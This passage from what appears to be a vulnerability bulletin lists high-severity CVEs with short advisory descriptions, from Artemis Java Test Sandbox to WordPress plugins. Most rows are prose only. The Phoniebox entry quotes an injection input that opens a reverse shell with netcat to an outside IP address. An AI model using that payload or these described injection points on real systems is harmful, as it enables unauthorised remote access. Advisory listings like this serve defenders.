| ls1intum — artemis_java_test_sandbox | Artemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code. | 2024-01-19 | 8.2 | CVE-2024-23683 disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com |
| mate-desktop — atril  |
Atril Document Viewer is the default document reader of the MATE desktop environment for Linux. A path traversal and arbitrary file write vulnerability exists in versions of Atril prior to 1.26.2. This vulnerability is capable of writing arbitrary files anywhere on the filesystem to which the user opening a crafted document has access. The only limitation is that this vulnerability cannot be exploited to overwrite existing files, but that doesn’t stop an attacker from achieving Remote Command Execution on the target system. Version 1.26.2 of Atril contains a patch for this vulnerability. | 2024-01-25 | 8.5 | CVE-2023-52076 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| mayurik — online_tours_&_travels_management_system | A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. Affected by this issue is the function exec of the file admin/operations/expense.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251558 is the identifier assigned to this vulnerability. | 2024-01-19 | 9.8 | CVE-2024-0735 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| microsoft — microsoft_edge_(chromium-based) Â |
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | 2024-01-26 | 9.6 | CVE-2024-21326 secure@microsoft.com |
| microsoft — microsoft_edge_(chromium-based) Â |
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | 2024-01-26 | 8.3 | CVE-2024-21385 secure@microsoft.com |
| mintplexlabs — anythingllm | AnythingLLM is an application that turns any document, resource, or piece of content into context that any LLM can use as references during chatting. In versions prior to commit `08d33cfd8` an unauthenticated API route (file export) can allow attacker to crash the server resulting in a denial of service attack. The “data-export” endpoint is used to export files using the filename parameter as user input. The endpoint takes the user input, filters it to avoid directory traversal attacks, fetches the file from the server, and afterwards deletes it. An attacker can trick the input filter mechanism to point to the current directory, and while attempting to delete it the server will crash as there is no error-handling wrapper around it. Moreover, the endpoint is public and does not require any form of authentication, resulting in an unauthenticated Denial of Service issue, which crashes the instance using a single HTTP packet. This issue has been addressed in commit `08d33cfd8`. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-01-19 | 7.5 | CVE-2024-22422 security-advisories@github.com security-advisories@github.com |
| monitorr — monitorr | A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 8.8 | CVE-2024-0713 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| motorola — mr2600 Â |
A command injection vulnerability exists in the ‘SaveSysLogParams’ parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, however can be bypassed. | 2024-01-26 | 9 | CVE-2024-23626 disclosures@exodusintel.com |
| motorola — mr2600 Â |
A command injection vulnerability exists in the ‘SaveStaticRouteIPv4Params’ parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, however can be bypassed. | 2024-01-26 | 9 | CVE-2024-23627 disclosures@exodusintel.com |
| motorola — mr2600 Â |
A command injection vulnerability exists in the ‘SaveStaticRouteIPv6Params’ parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, however can be bypassed. | 2024-01-26 | 9 | CVE-2024-23628 disclosures@exodusintel.com |
| motorola — mr2600 Â |
An authentication bypass vulnerability exists in the web component of the Motorola MR2600. An attacker can exploit this vulnerability to access protected URLs and retrieve sensitive information. | 2024-01-26 | 9.6 | CVE-2024-23629 disclosures@exodusintel.com |
| motorola — mr2600 Â |
An arbitrary firmware upload vulnerability exists in the Motorola MR2600. An attacker can exploit this vulnerability to achieve code execution on the device. Authentication is required, however can be bypassed. | 2024-01-26 | 9 | CVE-2024-23630 disclosures@exodusintel.com |
| mypresta — manufacturers_(brands)_images_block | In the module mib < 1.6.1 from MyPresta.eu for PrestaShop, a guest can perform SQL injection. The methods `mib::getManufacturersByCategory()` has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection. | 2024-01-19 | 9.8 | CVE-2023-46351 cve@mitre.org cve@mitre.org |
| nautobot — nautobot  |
Nautobot is a Network Source of Truth and Network Automation Platform built as a web application. All users of Nautobot versions earlier than 1.6.10 or 2.1.2 are potentially impacted by a cross-site scripting vulnerability. Due to inadequate input sanitization, any user-editable fields that support Markdown rendering, including are potentially susceptible to cross-site scripting (XSS) attacks via maliciously crafted data. This issue is fixed in Nautobot versions 1.6.10 and 2.1.2. | 2024-01-23 | 7.1 | CVE-2024-23345 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| ncr — terminal_handler | Cross Site Request Forgery vulnerability in NCR Terminal Handler v.1.5.1 allows a remote attacker to obtain sensitive information and escalate privileges via a crafted script to the UserSelfService component. | 2024-01-20 | 8.8 | CVE-2023-47024 cve@mitre.org cve@mitre.org |
| netapp — ontap_9 Â |
ONTAP 9 versions prior to 9.9.1P18, 9.10.1P16, 9.11.1P13, 9.12.1P10 and 9.13.1P4 are susceptible to a vulnerability which could allow an authenticated user with multiple remote accounts with differing roles to perform actions via REST API beyond their intended privilege. Possible actions include viewing limited configuration details and metrics or modifying limited settings, some of which could result in a Denial of Service (DoS). | 2024-01-26 | 7.6 | CVE-2024-21985 security-alert@netapp.com |
| nextendweb — smart_slider_3 | Deserialization of Untrusted Data vulnerability in Nextend Smart Slider 3.This issue affects Smart Slider 3: from n/a through 3.5.1.9. | 2024-01-19 | 8.8 | CVE-2022-45845 audit@patchstack.com |
| nvidia — bluefield_2_dpu_bmc_bluefield_3_dpu_bmc  |
NVIDIA Bluefield 2 and Bluefield 3 DPU BMC contains a vulnerability in ipmitool, where a root user may cause code injection by a network call. A successful exploit of this vulnerability may lead to code execution on the OS. | 2024-01-24 | 7.2 | CVE-2023-31037 psirt@nvidia.com |
| omron — cj-series_and_cs-series_cpu_modules  |
The Omron FINS protocol has an authenticated feature to prevent access to memory regions. Authentication is susceptible to bruteforce attack, which may allow an adversary to gain access to protected memory. This access can allow overwrite of values including programmed logic. | 2024-01-22 | 8.6 | CVE-2022-45790 ot-cert@dragos.com ot-cert@dragos.com ot-cert@dragos.com |
| omron — sysmac_studio  |
Project files may contain malicious contents which the software will use to create files on the filesystem. This allows directory traversal and overwriting files with the privileges of the logged-in user. | 2024-01-22 | 7.8 | CVE-2022-45792 ot-cert@dragos.com |
| openlibraryfoundation — mod-data-export-spring | Hard-coded credentials in FOLIO mod-data-export-spring versions before 1.5.4 and from 2.0.0 to 2.0.2 allows unauthenticated users to access critical APIs, modify user data, modify configurations including single-sign-on, and manipulate fees/fines. | 2024-01-19 | 9.1 | CVE-2024-23687 disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com |
| openvswitch — openvswitch | openvswitch 2.17.8 was discovered to contain a memory leak via the function xmalloc__ in openvswitch-2.17.8/lib/util.c. | 2024-01-19 | 7.5 | CVE-2024-22563 cve@mitre.org |
| orthanc — osimis_dicom_web_viewer  |
A XSS payload can be uploaded as a DICOM study and when a user tries to view the infected study inside the Osimis WebViewer the XSS vulnerability gets triggered. If exploited, the attacker will be able to execute arbitrary JavaScript code inside the victim’s browser. | 2024-01-23 | 7.1 | CVE-2023-7238 ics-cert@hq.dhs.gov |
| pcman_ftp_server_project — pcman_ftp_server | A vulnerability has been found in PCMan FTP Server 2.0.7 and classified as problematic. This vulnerability affects unknown code of the component PUT Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251554 is the identifier assigned to this vulnerability. | 2024-01-19 | 7.5 | CVE-2024-0731 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| pcman_ftp_server_project — pcman_ftp_server | A vulnerability was found in PCMan FTP Server 2.0.7 and classified as problematic. This issue affects some unknown processing of the component STOR Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251555. | 2024-01-19 | 7.5 | CVE-2024-0732 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| peteroupc — cbor | Inefficient algorithmic complexity in DecodeFromBytes function in com.upokecenter.cbor Java implementation of Concise Binary Object Representation (CBOR) versions 4.0.0 to 4.5.1 allows an attacker to cause a denial of service by passing a maliciously crafted input. Depending on an application’s use of this library, this may be a remote attacker. | 2024-01-19 | 7.5 | CVE-2024-23684 disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com |
| pimcore — admin-ui-classic-bundle  |
Pimcore’s Admin Classic Bundle provides a backend user interface for Pimcore. The application allows users to create zip files from available files on the site. In the 1.x branch prior to version 1.3.2, parameter `selectedIds` is susceptible to SQL Injection. Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level. Version 1.3.2 contains a fix for this issue. | 2024-01-24 | 8.8 | CVE-2024-23646 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| pimcore — admin-ui-classic-bundle  |
Pimcore’s Admin Classic Bundle provides a backend user interface for Pimcore. The password reset functionality sends to the the user requesting a password change an email containing an URL to reset its password. The URL sent contains a unique token, valid during 24 hours, allowing the user to reset its password. This token is highly sensitive; as an attacker able to retrieve it would be able to resets the user’s password. Prior to version 1.2.3, the reset-password URL is crafted using the “Host” HTTP header of the request sent to request a password reset. This way, an external attacker could send password requests for users, but specify a “Host” header of a website that they control. If the user receiving the mail clicks on the link, the attacker would retrieve the reset token of the victim and perform account takeover. Version 1.2.3 fixes this issue. | 2024-01-24 | 8.8 | CVE-2024-23648 security-advisories@github.com security-advisories@github.com |
| prestashopmodules — sliding_cart_block | In the module “Sliding cart block” (blockslidingcart) up to version 2.3.8 from PrestashopModules.eu for PrestaShop, a guest can perform SQL injection. | 2024-01-19 | 9.8 | CVE-2023-50028 cve@mitre.org cve@mitre.org |
| projectworlds — online_time_table_generator | A vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability. | 2024-01-19 | 9.8 | CVE-2024-0730 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| properfraction — profilepress | Deserialization of Untrusted Data vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress. This issue affects Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress: from n/a through 4.3.2. | 2024-01-19 | 7.2 | CVE-2022-45083 audit@patchstack.com |
| prosshd — prosshd | A vulnerability was found in ProSSHD 1.2 on Windows. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251548. | 2024-01-19 | 7.5 | CVE-2024-0725 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| python — pillow | Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter). | 2024-01-19 | 8.1 | CVE-2023-50447 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
| quantumcloud — chatbot_with_ai  |
Deserialization of Untrusted Data vulnerability in QuantumCloud ChatBot with AI. This issue affects ChatBot with AI: from n/a through 5.1.0. | 2024-01-24 | 8.7 | CVE-2024-22309 audit@patchstack.com |
| red-hat — quarkus  |
A flaw was found in the json payload. If annotation based security is used to secure a REST resource, the JSON body that the resource may consume is being processed (deserialized) prior to the security constraints being evaluated and applied. This does not happen with configuration based security. | 2024-01-25 | 8.6 | CVE-2023-6267 secalert@redhat.com secalert@redhat.com |
| red_hat — libtiff  |
An out-of-memory flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFRasterScanlineSize64() API. This flaw allows a remote attacker to cause a denial of service via a crafted input with a size smaller than 379 KB. | 2024-01-25 | 7.5 | CVE-2023-52355 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
| red_hat — libtiff  |
A segment fault (SEGV) flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFReadRGBATileExt() API. This flaw allows a remote attacker to cause a heap-buffer overflow, leading to a denial of service. | 2024-01-25 | 7.5 | CVE-2023-52356 secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com |
| red_hat — ovirt-engine  |
An authentication bypass vulnerability was found in overt-engine. This flaw allows the creation of users in the system without authentication due to a flaw in the CreateUserSession command. | 2024-01-25 | 9.1 | CVE-2024-0822 secalert@redhat.com secalert@redhat.com |
| red_hat — shim  |
A remote code execution vulnerability was found in Shim. The Shim boot support trusts attacker-controlled values when parsing an HTTP response. This flaw allows an attacker to craft a specific malicious HTTP request, leading to a completely controlled out-of-bounds write primitive and complete system compromise. | 2024-01-25 | 8.3 | CVE-2023-40547 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
| smsot — smsot | A vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument data[sign] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251556. | 2024-01-19 | 9.8 | CVE-2024-0733 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| smsot — smsot | A vulnerability was found in Smsot up to 2.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /get.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251557 was assigned to this vulnerability. | 2024-01-19 | 9.8 | CVE-2024-0734 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| snp_digital — salesking  |
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SNP Digital SalesKing. This issue affects SalesKing: from n/a through 1.6.15. | 2024-01-24 | 7.5 | CVE-2024-22154 audit@patchstack.com |
| sofastack — sofa-rpc  |
SOFARPC is a Java RPC framework. SOFARPC defaults to using the SOFA Hessian protocol to deserialize received data, while the SOFA Hessian protocol uses a blacklist mechanism to restrict deserialization of potentially dangerous classes for security protection. But, prior to version 5.12.0, there is a gadget chain that can bypass the SOFA Hessian blacklist protection mechanism, and this gadget chain only relies on JDK and does not rely on any third-party components. Version 5.12.0 fixed this issue by adding a blacklist. SOFARPC also provides a way to add additional blacklists. Users can add a class like `-Drpc_serialize_blacklist_override=org.apache.xpath.` to avoid this issue. | 2024-01-23 | 9.8 | CVE-2024-23636 security-advisories@github.com security-advisories@github.com |
| soflyy — export_any_wordpress_data_to_xml/csv | The Import any XML or CSV File to WordPress plugin before 3.7.3 accepts all zip files and automatically extracts the zip file into a publicly accessible directory without sufficiently validating the extracted file type. This may allows high privilege users such as administrator to upload an executable file type leading to remote code execution. | 2024-01-22 | 7.2 | CVE-2023-7082 contact@wpscan.com |
| sourcefabric — phoniebox | A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 9.8 | CVE-2024-0714 cna@vuldb.com cna@vuldb.com |
| splashtop — splashtop_software_updater  |
The C:Program Files (x86)SplashtopSplashtop Software Updateruninst.exe process creates a folder at C:WindowsTemp~nsu.tmp and copies itself to it as Au_.exe. The C:WindowsTemp~nsu.tmpAu_.exe file is automatically launched as SYSTEM when the system reboots or when a standard user runs an MSI repair using Splashtop Streamer’s Windows Installer. Since the C:WindowsTemp~nsu.tmp folder inherits permissions from C:WindowsTemp and Au_.exe is susceptible to DLL hijacking, standard users can write a malicious DLL to it and elevate their privileges. | 2024-01-25 | 7.8 | CVE-2023-3181 cve-coordination@google.com |
| splunk — splunk_enterprise  |
In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data. This results in the unsafe deserialization of untrusted data from a separate disk partition on the machine. This vulnerability only affects Splunk Enterprise for Windows. | 2024-01-22 | 7.5 | CVE-2024-23678 prodsec@splunk.com prodsec@splunk.com |
| spring — spring_framework  |
In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. Specifically, an application is vulnerable when all of the following are true: * the application uses Spring MVC * Spring Security 6.1.6+ or 6.2.1+ is on the classpath Typically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions. | 2024-01-22 | 7.5 | CVE-2024-22233 security@vmware.com |
| sunnytoo — stblogsearch | SunnyToo stblogsearch up to v1.0.0 was discovered to contain a SQL injection vulnerability via the StBlogSearchClass::prepareSearch component. | 2024-01-19 | 9.8 | CVE-2023-43985 cve@mitre.org cve@mitre.org |
| sveltejs — kit  |
SvelteKit is a web development kit. In SvelteKit 2, sending a GET request with a body eg `{}` to a built and previewed/hosted sveltekit app throws `Request with GET/HEAD method cannot have body.` and crashes the preview/hosting. After this happens, one must manually restart the app. `TRACE` requests will also cause the app to crash. Prerendered pages and SvelteKit 1 apps are not affected. `@sveltejs/adapter-node` versions 2.1.2, 3.0.3, and 4.0.1 and `@sveltejs/kit` version 2.4.3 contain a patch for this issue. | 2024-01-24 | 7.5 | CVE-2024-23641 security-advisories@github.com security-advisories@github.com |
| swftools — swftools | swftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c. | 2024-01-19 | 7.8 | CVE-2024-22562 cve@mitre.org |
| swftools — swftools | A stack-buffer-underflow vulnerability was found in SWFTools v0.9.2, in the function parseExpression at src/swfc.c:2602. | 2024-01-19 | 7.8 | CVE-2024-22911 cve@mitre.org |
| swftools — swftools | A global-buffer-overflow was found in SWFTools v0.9.2, in the function countline at swf5compiler.flex:327. It allows an attacker to cause code execution. | 2024-01-19 | 7.8 | CVE-2024-22912 cve@mitre.org |
| swftools — swftools | A heap-buffer-overflow was found in SWFTools v0.9.2, in the function swf5lex at lex.swf5.c:1321. It allows an attacker to cause code execution. | 2024-01-19 | 7.8 | CVE-2024-22913 cve@mitre.org |
| swftools — swftools | A heap-use-after-free was found in SWFTools v0.9.2, in the function swf_DeleteTag at rfxswf.c:1193. It allows an attacker to cause code execution. | 2024-01-19 | 7.8 | CVE-2024-22915 cve@mitre.org |
| swftools — swftools | swftools0.9.2 was discovered to contain a global-buffer-overflow vulnerability via the function parseExpression at swftools/src/swfc.c:2587. | 2024-01-19 | 7.8 | CVE-2024-22919 cve@mitre.org |
| swftools — swftools | swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c. | 2024-01-19 | 7.8 | CVE-2024-22920 cve@mitre.org |
| swftools — swftools | swftools 0.9.2 was discovered to contain a stack-buffer-underflow vulnerability via the function parseExpression at swftools/src/swfc.c:2576. | 2024-01-19 | 7.8 | CVE-2024-22955 cve@mitre.org |
| swftools — swftools | swftools 0.9.2 was discovered to contain a heap-use-after-free vulnerability via the function removeFromTo at swftools/src/swfc.c:838 | 2024-01-19 | 7.8 | CVE-2024-22956 cve@mitre.org |
| symantec — data_loss_prevention  |
A buffer overflow vulnerability exists in Symantec Data Loss Prevention version 14.0.2 and before. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a crafted document to achieve code execution. | 2024-01-26 | 9.6 | CVE-2024-23617 disclosures@exodusintel.com |
| symantec — deployment_solution | A buffer overflow vulnerability exists in Symantec Deployment Solution version 7.9 when parsing UpdateComputer tokens. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as SYSTEM. | 2024-01-26 | 10 | CVE-2024-23613 disclosures@exodusintel.com |
| symantec — messaging_gateway  |
A buffer overflow vulnerability exists in Symantec Messaging Gateway versions 9.5 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as root. | 2024-01-26 | 10 | CVE-2024-23614 disclosures@exodusintel.com |
| symantec — messaging_gateway  |
A buffer overflow vulnerability exists in Symantec Messaging Gateway versions 10.5 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as root. | 2024-01-26 | 10 | CVE-2024-23615 disclosures@exodusintel.com |
| symantec — server_management_suite  |
A buffer overflow vulnerability exists in Symantec Server Management Suite version 7.9 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as SYSTEM. | 2024-01-26 | 10 | CVE-2024-23616 disclosures@exodusintel.com |
| systemk_ — nvr_504 Â |
SystemK NVR 504/508/516 versions 2.3.5SK.30084998 and prior are vulnerable to a command injection vulnerability in the dynamic domain name system (DDNS) settings that could allow an attacker to execute arbitrary commands with root privileges. | 2024-01-25 | 9.8 | CVE-2023-7227 ics-cert@hq.dhs.gov |
| technicolor — tc8715d_firmware | Technicolor TC8715D devices have predictable default WPA2 security passwords. An attacker who scans for SSID and BSSID values may be able to predict these passwords. | 2024-01-22 | 8.8 | CVE-2023-47352 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
| thomas_belser — asgaros_forum  |
Deserialization of Untrusted Data vulnerability in Thomas Belser Asgaros Forum. This issue affects Asgaros Forum: from n/a through 2.7.2. | 2024-01-24 | 8.7 | CVE-2024-22284 audit@patchstack.com |
| tlsfuzzer — python-ecdsa  |
The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Versions 0.18.0 and prior are vulnerable to the Minerva attack. As of time of publication, no known patched version exists. | 2024-01-23 | 7.4 | CVE-2024-23342 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| trendnet — tew-800mb  |
A vulnerability was found in TRENDnet TEW-800MB 1.0.1.0 and classified as critical. Affected by this issue is some unknown functionality of the component POST Request Handler. The manipulation of the argument DeviceURL leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252122 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 7.2 | CVE-2024-0918 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| trendnet — tew-815dap  |
A vulnerability was found in TRENDnet TEW-815DAP 1.0.2.0. It has been classified as critical. This affects the function do_setNTP of the component POST Request Handler. The manipulation of the argument NtpDstStart/NtpDstEnd leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252123. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 8.8 | CVE-2024-0919 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| trendnet — tew-822dre  |
A vulnerability was found in TRENDnet TEW-822DRE 1.03B02. It has been declared as critical. This vulnerability affects unknown code of the file /admin_ping.htm of the component POST Request Handler. The manipulation of the argument ipv4_ping/ipv6_ping leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252124. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 7.2 | CVE-2024-0920 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| tutao — tutanota  |
Tuta is an encrypted email service. Starting in version 3.118.12 and prior to version 3.119.10, an attacker is able to send a manipulated email so that the user can no longer use the app to get access to received emails. By sending a manipulated email, an attacker could put the app into an unusable state. In this case, a user can no longer access received e-mails. Since the vulnerability affects not only the app, but also the web application, a user in this case has no way to access received emails. This issue was tested with iOS and the web app, but it is possible all clients are affected. Version 3.119.10 fixes this issue. | 2024-01-25 | 7.5 | CVE-2024-23655 security-advisories@github.com security-advisories@github.com |
| ukrsolution — barcode_scanner_and_inventory_manager | Unrestricted Upload of File with Dangerous Type vulnerability in UkrSolution Barcode Scanner and Inventory manager. This issue affects Barcode Scanner and Inventory manager: from n/a through 1.5.1. | 2024-01-24 | 10 | CVE-2023-52221 audit@patchstack.com |
| uniview– isc  |
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in Uniview ISC 2500-S up to 20210930. Affected by this issue is the function setNatConfig of the file /Interface/DevManage/VM.php. The manipulation of the argument natAddress/natPort/natServerPort leads to os command injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251696. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. | 2024-01-22 | 8 | CVE-2024-0778 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| unix4lyfe — darkhttpd | darkhttpd before 1.15 uses strcmp (which is not constant time) to verify authentication, which makes it easier for remote attackers to bypass authentication via a timing side channel. | 2024-01-22 | 9.8 | CVE-2024-23771 cve@mitre.org cve@mitre.org cve@mitre.org |
| vite — vite  |
Vite is a frontend tooling framework for javascript. The Vite dev server option `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows. This bypass is similar to CVE-2023-34092 — with surface area reduced to hosts having case-insensitive filesystems. Since `picomatch` defaults to case-sensitive glob matching, but the file server doesn’t discriminate; a blacklist bypass is possible. By requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. This issue has been addressed in vite@5.0.12, vite@4.5.2, vite@3.2.8, and vite@2.9.17. Users are advised to upgrade. Users unable to upgrade should restrict access to dev servers. | 2024-01-19 | 7.5 | CVE-2024-23331 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| weaver — e-cology | An issue in weaver e-cology v.10.0.2310.01 allows a remote attacker to execute arbitrary code via a crafted script to the FrameworkShellController component. | 2024-01-20 | 9.8 | CVE-2023-51892 cve@mitre.org cve@mitre.org cve@mitre.org |
| webtoffee — order_export_&_order_import_for_woocommerce  |
Unrestricted Upload of File with Dangerous Type vulnerability in WebToffee Order Export & Order Import for WooCommerce. This issue affects Order Export & Order Import for WooCommerce: from n/a through 2.4.3. | 2024-01-24 | 8 | CVE-2024-22135 audit@patchstack.com |
| webtoffee — product_import_export_for_woocommerce  |
Unrestricted Upload of File with Dangerous Type vulnerability in WebToffee Product Import Export for WooCommerce. This issue affects Product Import Export for WooCommerce: from n/a through 2.3.7. | 2024-01-24 | 8 | CVE-2024-22152 audit@patchstack.com |
| webtoffee — stripe_payment_plugin_for_woocommerce | The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the ‘id’ parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-01-19 | 7.5 | CVE-2024-0705 security@wordfence.com security@wordfence.com |
| wordpress — wordpress  |
Server-Side Request Forgery (SSRF) vulnerability in Montonio Montonio for WooCommerce, Wpopal Wpopal Core Features, AMO for WP – Membership Management ArcStone wp-amo, Long Watch Studio WooVirtualWallet – A virtual wallet for WooCommerce, Long Watch Studio WooVIP – Membership plugin for WordPress and WooCommerce, Long Watch Studio WooSupply – Suppliers, Supply Orders and Stock Management, Squidesma Theme Minifier, Paul Clark Styles styles, Designmodo Inc. WordPress Page Builder – Qards, Philip M. Hofer (Frumph) PHPFreeChat, Arun Basil Lal Custom Login Admin Front-end CSS, Team Agence-Press CSS Adder By Agence-Press, Unihost Confirm Data, deano1987 AMP Toolbox amp-toolbox, Arun Basil Lal Admin CSS MU.This issue affects Montonio for WooCommerce: from n/a through 6.0.1; Wpopal Core Features: from n/a through 1.5.8; ArcStone: from n/a through 4.6.6; WooVirtualWallet – A virtual wallet for WooCommerce: from n/a through 2.2.1; WooVIP – Membership plugin for WordPress and WooCommerce: from n/a through 1.4.4; WooSupply – Suppliers, Supply Orders and Stock Management: from n/a through 1.2.2; Theme Minifier: from n/a through 2.0; Styles: from n/a through 1.2.3; WordPress Page Builder – Qards: from n/a through 1.0.5; PHPFreeChat: from n/a through 0.2.8; Custom Login Admin Front-end CSS: from n/a through 1.4.1; CSS Adder By Agence-Press: from n/a through 1.5.0; Confirm Data: from n/a through 1.0.7; AMP Toolbox: from n/a through 2.1.1; Admin CSS MU: from n/a through 2.6. | 2024-01-19 | 8.2 | CVE-2022-40700 audit@patchstack.com audit@patchstack.com audit@patchstack.com audit@patchstack.com audit@patchstack.com audit@patchstack.com audit@patchstack.com audit@patchstack.com audit@patchstack.com audit@patchstack.com audit@patchstack.com audit@patchstack.com audit@patchstack.com audit@patchstack.com audit@patchstack.com |
| wordpress — wordpress  |
The WPForms Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form submission parameters in all versions up to, and including, 1.8.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-01-20 | 7.2 | CVE-2023-7063 security@wordfence.com security@wordfence.com |
| wp_overnight — pdf_invoices_&_packing_slips_for_woocommerce  |
